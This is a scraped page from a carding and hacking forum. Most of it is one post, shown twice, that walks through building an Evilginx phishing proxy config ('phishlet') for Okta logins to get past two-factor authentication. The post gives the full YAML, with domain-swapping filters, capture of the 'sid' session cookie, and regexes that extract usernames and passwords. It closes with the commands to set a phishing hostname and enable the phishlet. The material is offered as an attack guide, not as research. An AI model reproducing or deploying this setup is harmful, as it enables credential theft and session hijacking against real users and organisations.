Home
Forums
New posts
Search forums
What's new
New posts
New profile posts
Latest activity
Members
Current visitors
New profile posts
Search profile posts
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Learning how to bypass two-factor authentication (Google Authenticator, SMS)
Message
<blockquote data-quote="Ghosthunter" data-source="post: 511" data-attributes="member: 6"><p>After collecting this and a couple of other requests, we get the following settings::</p><p></p><p>Code:</p><p>sub_filters:</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p></p><p>Key word{hostname}</p><p></p><p>it is used to replace the original domain with a phishing one. Read more about the syntax of this section <a href="https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)#sub_filters" target="_blank">here</a>.</p><p></p><p>Remember, we need cookies that we will use to log in to the site. Through trial and error, we find out the cookie name —sid</p><p></p><p>, and add it to the settings:</p><p></p><p>Code:</p><p>auth_tokens:</p><p> - domain: '< target domain>.okta.com'</p><p> keys: ['sid']</p><p></p><p>We will also need the user's username and password.We have already found the request in which they are transmitted. As you can see in the request, the parameters we need areusername</p><p></p><p>and password</p><p></p><p>passed in json, appending it:</p><p></p><p>Code:</p><p>credentials:</p><p> username:</p><p> key: 'username'</p><p> search: '"username":"([^"]*)'</p><p> type: 'json'</p><p> password:</p><p> key: 'password'</p><p> search: '"password":"([^"]*)'</p><p> type: 'json'</p><p></p><p>This way, Evilginx can isolate them from requests and save them correctly.</p><p></p><p>There's not much left. Specify the URL of the login page on the target domain.</p><p></p><p>Code:</p><p>landing_path:</p><p> - '/login/login.htm'</p><p></p><p>Specify the URL that we will use to indicate that the user has successfully logged in.</p><p></p><p>Code:</p><p>auth_urls:</p><p> - 'app/UserHome'</p><p></p><p>That's all! The entire config:</p><p></p><p>Code:</p><p>name: 'okta'</p><p>author: '@*******, updated by @*******'</p><p>min_ver: '2.2.0'</p><p>proxy_hosts:</p><p> - {phish_sub:", orig_sub: '<target company name subdomain>", domain: 'okta.com', session: true, is_landing: true}</p><p>sub_filters:</p><p>sub_filters:</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p> - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']}</p><p></p><p>Save it as okta.yaml</p><p></p><p>Code:</p><p>in/usr/share/evilginx/phishlets</p><p></p><h4>Step four-enable our new phishing feature</h4><p>Run evilginx and write the command</p><p></p><p>Code:</p><p>phishlets hostname okta okta.<our phishing domain>. com</p><p></p><p>Enabling phishlet.</p><p></p><p>Code:</p><p>phishlets enable okta</p><p></p><p>A certificate from LetsEncrypt is automatically created for it.</p></blockquote><p></p>
[QUOTE="Ghosthunter, post: 511, member: 6"] After collecting this and a couple of other requests, we get the following settings:: Code: sub_filters: - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']} - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']} - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']} Key word{hostname} it is used to replace the original domain with a phishing one. Read more about the syntax of this section [URL='https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)#sub_filters']here[/URL]. Remember, we need cookies that we will use to log in to the site. Through trial and error, we find out the cookie name —sid , and add it to the settings: Code: auth_tokens: - domain: '< target domain>.okta.com' keys: ['sid'] We will also need the user's username and password.We have already found the request in which they are transmitted. As you can see in the request, the parameters we need areusername and password passed in json, appending it: Code: credentials: username: key: 'username' search: '"username":"([^"]*)' type: 'json' password: key: 'password' search: '"password":"([^"]*)' type: 'json' This way, Evilginx can isolate them from requests and save them correctly. There's not much left. Specify the URL of the login page on the target domain. Code: landing_path: - '/login/login.htm' Specify the URL that we will use to indicate that the user has successfully logged in. Code: auth_urls: - 'app/UserHome' That's all! The entire config: Code: name: 'okta' author: '@*******, updated by @*******' min_ver: '2.2.0' proxy_hosts: - {phish_sub:", orig_sub: '<target company name subdomain>", domain: 'okta.com', session: true, is_landing: true} sub_filters: sub_filters: - {triggers_on: '<target domain>.okta.com', orig_sub: '<target domain>', domain: 'okta.com', search: 'https://{hostname}/api', replace: 'https://{hostname}/api', mimes: ['text/html', 'application/json']} - {triggers_on: 'login.okta.com', orig_sub: 'login', domain: 'okta.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: 'https\x3A\x2F\x2F{hostname}', replace: 'httpsx3Ax2Fx2F{hostname}', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']} - {triggers_on: '<target domain>.okta.com', orig_sub: ", domain: '<target domain>.okta.com', search: '\x2Fuser\x2Fnotifications', replace: 'httpsx3Ax2Fx2F < target domain>. okta.comx2Fuserx2Fnotifications', mimes: ['text / html', 'application/json', 'application/x-javascript', 'text/javascript']} Save it as okta.yaml Code: in/usr/share/evilginx/phishlets [HEADING=3]Step four-enable our new phishing feature[/HEADING] Run evilginx and write the command Code: phishlets hostname okta okta.<our phishing domain>. com Enabling phishlet. Code: phishlets enable okta A certificate from LetsEncrypt is automatically created for it. [/QUOTE]
Name
Verification
Post reply
Home
Forums
CARDING & HACKING
HOSTING & BOTNET
Learning how to bypass two-factor authentication (Google Authenticator, SMS)
Top